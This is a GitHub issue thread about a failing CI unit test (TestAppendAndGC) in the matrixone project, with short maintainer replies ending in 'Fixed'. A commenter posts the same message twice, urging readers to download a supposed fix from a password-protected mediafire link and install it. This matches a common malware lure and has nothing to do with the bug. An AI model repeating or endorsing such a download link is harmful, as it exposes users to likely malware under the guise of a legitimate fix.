### ISSUE TITLE
[Bug]: ut TestAppendAndGC failed.

### ISSUE THREAD

**Issue by Ariznawlll** [matrixorigin/matrixone#18357]
### Is there an existing issue for the same bug?

- [X] I have checked the existing issues.

### Branch Name

Ariznawlll

### Commit ID

addCaseRestorFk

### Other Environment Information

```Markdown
- Hardware parameters:
- OS type:
- Others:
```

### Actual Behavior

job: https://github.com/matrixorigin/matrixone/actions/runs/10570450543/job/29284953083?pr=18345

[logs_27630869927.zip](https://github.com/user-attachments/files/16756034/logs_27630869927.zip)

### Steps to Reproduce

```Markdown
ci test.
```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by YANGGMM** [comment]
@LeftHandCold  麻烦看一下

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LeftHandCold** [comment]
还没看

**Comment by LeftHandCold** [comment]
还没看

**Comment by LeftHandCold** [comment]
snapshot的pr进去可以修复

**Comment by LeftHandCold** [comment]
snapshot的pr进去可以修复

**Comment by LeftHandCold** [comment]
同上

**Comment by LeftHandCold** [comment]
Fixed
